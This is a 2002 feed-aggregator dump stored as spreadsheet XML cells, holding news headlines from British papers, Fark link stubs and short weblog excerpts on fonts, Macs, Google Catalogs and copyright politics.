    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/20.html
Date: 2002-09-20T16:13:37-08:00Jeremy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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357893,215/
Date: 2002-09-29T00:40:02+01:00It wasn't just the lack of wellies that made this protest different - it was 
the mix of the marchers, writes *Euan Ferguson*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8358764,215/
Date: 2002-09-29T01:41:02+01:00PM rules out compromise on public service reform in hard-hitting pre-conference 
interview.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357896,215/
Date: 2002-09-29T00:39:58+01:00*Politics:* She was vivacious, he was Mr Grey. Theirs was a love no one 
imagined.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357894,215/
Date: 2002-09-29T00:40:00+01:00*UK latest:* Sacked regulator accuses her of 'unbearable pressure'.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357899,215/
Date: 2002-09-29T00:39:55+01:00*Media*: It only took one column in a newspaper by Rod Liddle, editor of 
radio's flagship new show, to put the BBC under pressure. Jamie Doward and 
Vanessa Thorpe report on unease within the corporation's top brass - and how 
the affair could shape its future
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357897,215/
Date: 2002-09-29T00:39:57+01:00*Comment:* Prince Charles's attempts to meddle in politics show how detached he 
is from real life, says *Nick Cohen*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
Date: 2002-09-12T23:03:40-08:00If you've been in Los Angeles for long enough to read this sentence, chances 
are you've spent more time stuck in traffic than you would care to consider. 
That annoying fact of Southern California life is only going to become more 
annoying and more of a factor with time, which is the point of "Car Trek," 
tonight's edition of "By the Year 2000" at 7:30 on KCET (Channel 28) [which] 
also looks at the phenomena of "carcooning" in which...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
Date: 2002-09-12T17:08:46-08:00The Oracle of Google can answer multiple choice questions amazingly well ... 
Who is the author of Perl?, What family lives next door to the Simpsons?. As 
the author points out on the about page; this thing would be really useful in a 
"Who Wants To Be a Millionaire" type contest. =)...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357898,215/
Date: 2002-09-29T00:39:56+01:00*Football:* Kolo Toure was among the goals as Arsenal gave Leeds a good hiding 
at Elland Road.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357900,215/
Date: 2002-09-29T00:39:54+01:00*Euan Ferguson* spends two days at the headquarters of a stationery supplier in 
Slough and finds the team is much nicer than Ricky Gervais's gallery of 
grotesques.ï¿½*Sketches of pain*[1][1] http://www.newsisfree.com/Observer/review/story/0,6903,800788,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8341698,1440/
Date: Not suppliedUsing one species to develop the eggs of another could in future help 
endangered species and even women
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/07.html
Date: 2002-09-07T06:10:55-08:00I am thinking about getting a new Mac. Not any good reason for it though. I'll 
try to wait it out for one of the new iBooks rumored for next spring. No new 
PowerBook next month if new models come out. No. I said no! Stop thinking about 
it. Don't do it. I said don't do it. No. No, it's a really bad idea. Don't. 
Geez. Stop it! No, not even if it has an even cooler monitor. Or a...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/24.html
Date: 2002-09-24T02:31:20-08:00This Monkey Switch Ad is too funny. Huge smile on my face. :-) It was the 
winner of a competition MacRumors had set up. (Via Nathan)...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8355996,215/
Date: 2002-09-28T23:38:59+01:00*Dan Rookwood* and *Lawrence Booth* on how Europe and the United States ended 
all-square to set up a tense final day.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/29.html#dooce
Date: 2002-09-29T23:40:06-05:00Reborn[1].[1] http://www.dooce.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000619
Date: 2002-09-30T00:33:14-06:00Anyone have a copy of Gill Sans or Bell Centennial I can borrow? I wonder if 
I'll ever have $250 to spend on fonts. *Update:* Kevin Marks[1], who is 
stupendously incredible for far more things than I can list here points out 
that it's _included with OS X_. I knew Mac OS X included a lot of grat fonts[2]
, but I don't know how I overlooked this. (Matthew Carter, I'd be happy to pay 
you the two cents in royalties you probably get for selling $100 worth of 
fonts.) Tufte notes: Terrie Miller[3]. First ammendement beer bash. iSync Beta[4] (guess they learned a lesson from iCal) is out.[1] http://epeus.blogspot.com
[2] http://www.apple.com/macosx/features/font.html
[3] http://www.oreillynet.com/~terrie/tufte/
[4] http://www.apple.com/isync/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506002
Date: Not suppliedAfter the talk at UT Austin, I spent Saturday at the Turkey City science 
fiction writers' workshop at Bruce Sterling's place. Turkey City is a venerable 
science fiction workshop that has spawned many good writers and a lexicon of 
science fiction critical terms that is the de facto standard for understanding 
what works and what doesn't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It's hard to 
    properly dramatize, say, the domestic effects of Dad's bank overdraft when 
    a giant writhing kraken is levelling the city. This mismatch between the 
    conventional dramatic proprieties and SF's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I'm jetlagged, but I wanted to get 
some links up before I hit the sack. Until tomorrow! Link[1] Discuss[2][1] http://www.sfwa.org/writing/turkeycity.html
[2] http://www.quicktopic.com/boing/H/cgivZf3AAhKkk
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85505995
Date: Not suppliedI've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Discuss[3][1] http://www.weblogsky.com/2002_09_01_blarchive.html#85500802
[2] http://wmf.editthispage.com/2002/09/27
[3] http://www.quicktopic.com/boing/H/4rEePy7RSm38x
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85505975
Date: Not supplied[IMG: http://www.craphound.com/images/electricball.jpg] Stefan sez: "My 
brother's friend Sue plays with high voltage. The linked-to page shows the 
gadget she used to photograph high voltage discharges in *water*." Link[1] 
Discuss[2] (_Thanks, Stefan!_) 
[1] http://community.webshots.com/album/8426665GzkjEytinE
[2] http://www.quicktopic.com/boing/H/uzUstBTSpq7K
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381139,215/
Date: 2002-09-30T03:05:04+01:00No retreat on PFI, unions are warned.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381140,215/
Date: 2002-09-30T03:05:03+01:00Sinn Fein president accused of setting up IRA cell to kill 'informers'.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381145,215/
Date: 2002-09-30T03:04:58+01:00*Arts:* Fourth art raid on philanthropist's home once targeted by the IRA and 
Dublin gangster Martin Cahill.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381147,215/
Date: 2002-09-30T03:04:56+01:00*Money:* Struggling mutual insurance society admits to scale of mis-selling.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8365765,1440/
Date: Not suppliedProfessionals are asking amateurs to sign up and help them glean valuable 
information about planets orbiting distant stars
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381141,215/
Date: 2002-09-30T03:05:02+01:00It is eight years since botanist David Bellamy made a TV series. What went 
wrong, asks *Simon Hattenstone*.ï¿½Quizzes[1]ï¿½| Crossword[2]ï¿½| Interactive guides
[3]ï¿½| Steve Bell[4]ï¿½| Weblog[5]ï¿½*Other news and comment**'Biggles Airways' plan 
to put RAF into tourism business*[6][1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
[2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
[3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
[4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
[5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
[6] http://www.newsisfree.com/military/story/0,11816,801625,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381143,215/
Date: 2002-09-30T03:05:00+01:00*Business:* City and Wall Street are sceptical of plan to prevent more 
countries slipping into Argentina-style crisis
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381144,215/
Date: 2002-09-30T03:04:59+01:00*Politics:* Edwina Currie 'sad and indignant' at hearing John Major's admission 
of shame at their four-year affair.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381146,215/
Date: 2002-09-30T03:04:57+01:00*Internet news:* Can Freeserve hold on to its position as the ISP that most 
Britons dial up to, asks Kate Bulkley.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000202.html
Date: 2002-09-29T12:01:43-08:00I like Kasia's latest idea. Let's all try that. But not on the same day. Maybe 
we should all use our birthdays as the basis. Since I was born on June 4th, 
I'll be stupid on the 4th of every...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000200.html
Date: 2002-09-29T10:59:19-08:00Strangely, I managed to get up before 9am (on a Sunday!) without the aid of an 
alarm clock. Not sure how that happened. I had some breakfast (muffin with 
jelly and peanut butter, and strawberry drink) while catching up on...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000201.html
Date: 2002-09-29T11:52:44-08:00I forgot to write this up yesterday and didn't feel like forging the blog entry 
date. Anyway, while taking a break from writing the book, I tried to finish up 
the work on friends.zawodny.com before I ship it off to...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381142,215/
Date: 2002-09-30T03:05:01+01:00*World latest:* Israel pulled its tanks and soldiers out of Yasser Arafat's 
West Bank headquarters yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_3
Date: 2002-10-01T00:23:58-05:00_Dean Allen_: About the author[1]. â€œThe funniest thing Dean has ever 
witnessed was some footage of narcoleptic dogs in a Nova documentary on sleep 
disorders.â€[1] http://www.textism.com/about/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_2
Date: 2002-10-01T00:22:28-05:00_Heather Hamilton_: About[1]. â€œI am that girl.â€[1] http://www.dooce.com/about.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_1
Date: 2002-10-01T00:11:05-05:00_Jason Gurley_: Rap Sheet[1]. â€œI once played drums in a band with no name 
that never played a single gig anywhere.â€[1] http://www.deeplyshallow.com/archive/000426.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85507259
Date: Not suppliedThe Antikythera mechanism, recovered off a sunken ship in Greece in 1900, is 
thought to be a clockwork device to calculate the orbits of the celestial 
bodies. New analysis of the remaining fragments shows that it was wicked-cool:     The Greeks believed in an earth-centric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timeï¿½Mars,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Link[1] Discuss[2] (_Thanks, Mark!_)[1] http://www.economist.com/displaystory.cfm?story_id=1337165
[2] http://www.quicktopic.com/boing/H/UKW9AAQCsFibH
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#i_mean_why_not
Date: 2002-10-01T00:06:36-05:00_Kevin Fanning_: Hallmark vs. Successories[1]. â€œAt Successories you were 
mostly left alone. There'd be brainstorm meetings to come up with new topics to 
tackle ("Howsabout 'Diligence'?" "No I think we did that one already, didn't 
we?") but mostly you could just hang around, bang away at whatever ideas you 
had, show your manager what you were working on, and he/she'd give you 
feedback, encouragement, tell you to keep at it, point to the poster of 
Stick-to-it-iveness on their wall (Yes, we had our own brand of Successories 
posters hanging everywhere. I mean why not.) and give you the thumbs up.â€[1] http://www.whygodwhy.com/archive/000071.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506950
Date: Not suppliedDan Gillmor interviewed Jack Valenti[1] last week in his column and did the 
impartial thing, representing Valenti's beliefs as fairly as possible. This 
week, Dan takes Valenti's arguments apart, looking at what Hollywood's agenda 
really entails:     So the movie and music companies are going back to Congress for another 
    helping. They are asking for laws that would force technology innovators to 
    restrict the capabilities of devices -- cripple PCs and other machines that 
    communicate so they can't make copies the copyright holders don't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it's nothing 
    but a jazzed-up television. Instead of accepting, as they do today, that a 
    certain amount of penny-ante infringement will occur and then going after 
    the major-league pirates, they call every act of infringement -- and some 
    things that aren't infringement at all -- an act of piracy or stealing. 
    Saying it doesn't make it so.  Link[2] Discuss[3][1] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/4132447.htm
[2] http://www.siliconvalley.com/mld/siliconvalley/4175607.htm
[3] http://www.quicktopic.com/boing/H/WDUVXyKf9qUj
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#un
Date: 2002-09-30T23:57:43-05:00_Paul Ford_: East River Unconsecration[1]. â€œThere are a lot of hearts 
under the East River, and it took a long time for it to find mine.â€[1] http://ftrain.com/east_river_unconsecration.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8424915,1717/
Date: 2002-10-01T09:35:16+01:00[IMG: http://www.newsisfree.com/Images/fark/salon.gif ([Salon])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506836
Date: Not suppliedSlashdot's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Link[1] Discuss[2][1] http://slashdot.org/article.pl?sid=02/09/29/2232249&amp;mode=flat&amp;tid=126
[2] http://www.quicktopic.com/boing/H/SVZhehqjGbC
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410271,1717/
Date: 2002-09-30T22:21:10+01:00[IMG: http://www.newsisfree.com/Images/fark/nandotimes.gif ([NandoTimes])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418823,215/
Date: 2002-10-01T04:34:02+01:00Treasury admits that growth targets set in March have been destroyed by the 
worsening global economy.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412057,1717/
Date: 2002-09-30T23:25:23+01:00(TBO)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412058,1717/
Date: 2002-09-30T23:25:22+01:00[IMG: http://www.newsisfree.com/Images/fark/local6.gif ([Local6])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404899,215/
Date: 2002-09-30T19:25:01+01:00*Sydney dispatch:* An Afghan boy whose family was killed during massacres in 
Mazar-i-Sharif has been denied asylum in Australia, says *David Fickling*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8399728,1440/
Date: Not suppliedAfter months of repairs to cracked fuel lines, the shuttle prepares for 
lift-off - an onboard video camera will relay live footage
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8397801,1440/
Date: Not suppliedThe antiviral drug significantly reduces the spread of the incurable infection 
through sex
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417796,215/
Date: 2002-10-01T03:33:02+01:00Iraq muddles US resolve with 'positive' talks in Vienna.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417754,1717/
Date: 2002-10-01T03:29:20+01:00[IMG: http://www.newsisfree.com/Images/fark/aicn.gif ([AintItCoolNews])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418826,215/
Date: 2002-10-01T04:33:58+01:00*Politics:* Michael Portillo strode into the hostile territory of the Labour 
party conference in Blackpool last night to mock David Blunkett as an 
authoritarian rightwinger.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423194,1717/
Date: 2002-10-01T08:34:11+01:00(St. Petersburg Times)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418824,215/
Date: 2002-10-01T04:34:00+01:00*Julian Glover*, who worked on John Major's autobiography for two years, on why 
Edwina Currie wasn't in it.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390121,1717/
Date: 2002-09-30T11:09:21+01:00[IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63598
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63598
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8398676,1717/
Date: 2002-09-30T16:15:15+01:00[IMG: http://www.newsisfree.com/Images/fark/iol.gif ([IOL])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8413685,1717/
Date: 2002-10-01T00:26:14+01:00(Some depraved farkette)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63309
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63309
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#wedding_etiquette
Date: 2002-09-30T12:16:54-05:00_Margaret Berry_: Don't Be Rude: Part IV, Weddings[1]. â€œThere's a lot of 
room for error with invitations. It's helpful to think of them as petite social 
landmines with quaint wax seals.â€[1] http://www.themorningnews.org/archives/editorial/dont_be_rude_part_iv_weddings.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418808,1717/
Date: 2002-10-01T04:30:17+01:00(The Cincinnati Enquirer)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8402896,1717/
Date: 2002-09-30T18:17:08+01:00(charlotte.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406746,1717/
Date: 2002-09-30T20:19:11+01:00[IMG: http://www.newsisfree.com/Images/fark/reuters.gif ([Reuters])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390119,1717/
Date: 2002-09-30T11:09:23+01:00[IMG: http://www.newsisfree.com/Images/fark/smh.com.au.gif ([smh.com.au])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412855,1440/
Date: Not suppliedThe modified form of vitamin D could be an effective new treatment for 
osteoporosis, says a US team
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000619
Date: 2002-09-30T00:33:14-06:00Anyone have a copy of Bell Centennial I can borrow? I wonder if I'll ever have 
$100 to spend on fonts. (Matthew Carter, I'd be happy to pay you the two cents 
in royalties you probably get for selling $100 worth of fonts.) *Update:* Kevin Marks[1], who is stupendously incredible for far more things 
than I can list here points out that Gill Sans (which I was asking for earlier) 
is _included with OS X_. I knew Mac OS X included a lot of great fonts[2], but 
I don't know how I overlooked this. _Awesome!_ Tufte notes: Terrie Miller[3]. First ammendement beer bash. iSync Beta[4] (guess they learned a lesson from iCal) is out.[1] http://epeus.blogspot.com
[2] http://www.apple.com/macosx/features/font.html
[3] http://www.oreillynet.com/~terrie/tufte/
[4] http://www.apple.com/isync/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417752,1717/
Date: 2002-10-01T03:29:22+01:00(ClickOnDetroit)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421063,1717/
Date: 2002-10-01T06:32:13+01:00(Some TV Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8398677,1717/
Date: 2002-09-30T16:15:14+01:00[IMG: http://www.newsisfree.com/Images/fark/sacbee.gif ([SacBee])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418829,215/
Date: 2002-10-01T04:33:55+01:00*Arts:* The long-running dispute between the widow of Kurt Cobain and the 
remaining two members of his band Nirvana has been settled, paving the way for 
a new CD.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421992,1717/
Date: 2002-10-01T07:33:14+01:00(abc.net.au)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404725,1717/
Date: 2002-09-30T19:18:23+01:00(Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8388719,1717/
Date: 2002-09-30T10:08:11+01:00(Some Farker's roommate)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418833,215/
Date: 2002-10-01T04:33:51+01:00*Money:* Up to 70,000 former Equitable Life policyholders could be in line for 
compensation as a result of mis-selling of policies.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8424916,1717/
Date: 2002-10-01T09:35:15+01:00(Local Library)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#best
Date: 2002-09-30T16:06:50-05:00_Heather Hamilton_: Very Best of the World's Worst[1]. â€œAfter watching 
last night's premiere of "The Very Best of the World's Worst Drivers: 2" I 
tried to figure out what it was about these very best worst drivers that made 
them the very best, but not really _the_ very best, because if they really were 
_the_ very best, wouldn't they have been featured on "The Very Best of the 
World's Worst Drivers: 1" ?â€[1] http://www.dooce.com/mtarchives/09_30_2002.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390122,1717/
Date: 2002-09-30T11:09:20+01:00[IMG: http://www.newsisfree.com/Images/fark/sun.gif ([The Sun])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418828,215/
Date: 2002-10-01T04:33:56+01:00*Media:* The race is on for the most coveted job in BBC News after Rod Liddle 
says he is stepping down as editor of the Today programme.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412059,1717/
Date: 2002-09-30T23:25:21+01:00[IMG: http://www.newsisfree.com/Images/fark/xent.gif ([X-Entertainment])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406748,1717/
Date: 2002-09-30T20:19:09+01:00(Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418827,215/
Date: 2002-10-01T04:33:57+01:00*World latest:* Dalai Lama's envoy hails first contact in 20 years.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000205.html
Date: 2002-09-30T23:14:34-08:00Watch out Yahoo Shopping and other shopping meta-sites. Google is at it again 
with Google Catalogs. The only question in mind mind is this: Will it hit big 
this Christmas shopping season or next year? Google Product Search and 
Ratings....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418831,215/
Date: 2002-10-01T04:33:53+01:00*Business:* Standard Life finally capitulates and cuts payouts on millions of 
policies.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000203.html
Date: 2002-09-30T17:22:34-08:00This is an issue that comes up all the time at work. It is an issue for roughly 
four reasons: Yahoo is a FreeBSD shop Someone has heard that MySQL runs better 
on Linux Someone knows that we run some...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410272,1717/
Date: 2002-09-30T22:21:09+01:00(Philly.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418832,215/
Date: 2002-10-01T04:33:52+01:00*Society:* Nurses and ancillary staff at a PFI hospital are set to win a legal 
battle over equal pay that will cost the hospital ï¿½97m in back pay and add ï¿½13m 
to its annual wage bill.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506723
Date: Not suppliedDisney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Discuss[2][1] http://reuters.com/news_article.jhtml?type=search&amp;StoryID=1510778
[2] http://www.quicktopic.com/boing/H/rw7cDXT3W44C
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421991,1717/
Date: 2002-10-01T07:33:15+01:00(orange-today.co)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8415146,1717/
Date: 2002-10-01T01:27:10+01:00(canada.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406747,1717/
Date: 2002-09-30T20:19:10+01:00(charlotte.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8394718,1717/
Date: 2002-09-30T14:13:10+01:00(Some Dysfunctional Woman)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390120,1717/
Date: 2002-09-30T11:09:22+01:00(Doc Brown)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418830,215/
Date: 2002-10-01T04:33:54+01:00*Comment:* The suppression of debate shows Labour's leadership at its worst, 
writes *Jonathan Freedland*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8415795,1440/
Date: Not suppliedNight-clubbers who swapped their glasses for contact lenses report big 
increases in physical contact with the opposite sex
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8391026,1440/
Date: Not suppliedCampaigners say this and other mega-projects renege on promises made by African 
leaders at the World Summit in Johannesburg
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8419990,1717/
Date: 2002-10-01T05:31:18+01:00[IMG: http://www.newsisfree.com/Images/fark/sun.gif ([The Sun])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000204.html
Date: 2002-09-30T20:42:06-08:00An article titled Mac poses as much of challenge to Linux as to Windows is both 
insightful and missing the point. The general thrust of the article, is 
dead-on. It's just the sort of stuff I've been saying to folks...
</t>
  </si>
  <si>
    <t>URL: http://www.aaronsw.com/weblog/000622
Date: 2002-09-30T17:28:45-06:00Aaron Warchalker will probably be on Public Radio's Marketplace tomorrow 
evening. I tried to cut down on the number of "you know"s but I didn't do too 
well. :-( I'll keep trying.</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423195,1717/
Date: 2002-10-01T08:34:10+01:00[IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8408636,1717/
Date: 2002-09-30T21:20:25+01:00(Poynter.org)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417753,1717/
Date: 2002-10-01T03:29:21+01:00[IMG: http://www.newsisfree.com/Images/fark/mdn.gif ([MDN])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412060,1717/
Date: 2002-09-30T23:25:20+01:00(Some guy with lice)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410270,1717/
Date: 2002-09-30T22:21:11+01:00(DPO)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8388720,1717/
Date: 2002-09-30T10:08:10+01:00(Some Game Boy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404724,1717/
Date: 2002-09-30T19:18:24+01:00(canada.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418825,215/
Date: 2002-10-01T04:33:59+01:00*UK latest:* Potters Bar claimants' group investigates reason for accident as 
it dismisses Railtrack's compensation offer.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410273,1717/
Date: 2002-09-30T22:21:08+01:00(dayton daily news)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423196,1717/
Date: 2002-10-01T08:34:09+01:00[IMG: http://www.newsisfree.com/Images/fark/ncbuy.gif ([NCBuy])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423193,1717/
Date: 2002-10-01T08:34:12+01:00(katu)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8396718,1717/
Date: 2002-09-30T15:14:16+01:00[IMG: http://www.newsisfree.com/Images/fark/homestar.gif ([Homestar Runner])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#there_are_four_lights
Date: 2002-10-01T12:53:57-05:00One year ago today, my (now former) manager told me to shut down my weblog and 
remove all traces of it from my server. He tried to convince me that the 
Internet was too small to mix the professional[1] and the personal[2]. One year ago today, I gave him my answer[3], and the rest is history[4]. Today, to celebrate this anniversary, I would like everyone to read my resume
